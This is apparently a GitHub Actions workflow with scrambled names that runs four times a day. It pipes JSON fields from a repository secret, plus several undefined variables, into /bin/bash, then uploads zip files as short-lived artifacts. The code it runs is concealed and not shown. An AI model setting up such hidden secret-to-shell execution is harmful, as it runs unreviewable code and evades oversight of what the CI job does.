name: xinlvfajie
on:
  workflow_dispatch:

  schedule:
    - cron: '42 3,9,15,21 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: xinlvfajie
        env:
          rfcr93420: ${{ secrets.rfcr93420 }}
        run: |
          printf '%s' "$rfcr93420" | jq -r .xoppo453 | /bin/bash
          printf '%s' "$cx550" | jq -r .s011 | /bin/bash
          printf '%s' "$pwlhz4741" | jq -r .b54497 | /bin/bash
          printf '%s' "$jf57902" | jq -r .b5 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: EfVM4gJS
          path: "*.zip"
          retention-days: 1
